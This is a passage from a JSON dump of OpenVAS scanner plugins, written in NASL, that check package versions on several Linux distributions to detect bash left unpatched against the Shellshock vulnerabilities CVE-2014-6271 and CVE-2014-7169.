LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2-2ubuntu2.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.1-2ubuntu3.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:44", "description": "Oracle Linux Local Security Checks ELSA-2014-3075", "cvss3": 
{}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3075", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123302", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3075.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123302\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:59 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3075\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3075 - bash security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3075\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3075.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.1.0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.1.0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:55", "description": "Oracle Linux Local Security Checks ELSA-2014-3077", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3077", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123301", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123301", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3077.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123301\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3077\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3077 - bash security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3077\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3077.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5.1.0.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:18", "description": "Oracle Linux Local Security Checks ELSA-2014-3076", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3076", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123300", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123300", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3076.nasl 11688 2018-09-28 13:36:28Z 
cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123300\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3076\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3076 - bash security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3076\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3076.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:48:52", "description": "Stephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. 
In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.", "cvss3": {}, "published": "2014-09-24T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3032-1 (bash - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:703032", "href": "http://plugins.openvas.org/nasl.php?oid=703032", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3032.nasl 6637 2017-07-10 09:58:13Z teissa $\n# Auto-generated from advisory DSA 3032-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703032);\n script_version(\"$Revision: 6637 $\");\n script_cve_id(\"CVE-2014-6271\");\n script_name(\"Debian Security Advisory DSA 3032-1 (bash - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-10 11:58:13 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-09-24 00:00:00 +0200 (Wed, 24 Sep 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3032.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bash on Debian Linux\");\n script_tag(name: \"insight\", value: \"Bash is an sh-compatible command language interpreter that executes\ncommands read from the standard input or from a file. Bash also\nincorporates useful features from the Korn and C shells (ksh and csh).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), this problem has been fixed in\nversion 4.2+dfsg-0.1+deb7u1.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name: \"summary\", value: \"Stephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. 
In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u1\", 
rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:13", "description": "Check the version of bash", "cvss3": {}, "published": "2014-10-06T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-12202", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868358", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-12202\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868358\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-06 05:56:22 +0200 (Mon, 06 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-12202\");\n script_tag(name:\"summary\", value:\"Check the version of bash\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bash on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if 
((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.51~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1260-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850945", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850945", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850945\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 14:51:14 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1260-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bash was updated to fix unexpected code execution with environment\n variables (CVE-2014-6271).\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1260-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~77.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", 
rpm:\"libreadline6-debuginfo~6.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~77.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1293 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882027", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882027", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1293 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882027\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-25 05:58:31 +0200 (Thu, 25 Sep 2014)\");\n script_cve_id(\"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1293 centos5\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a\nshell and command language interpreter compatible with the Bourne shell (sh).\nBash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. 
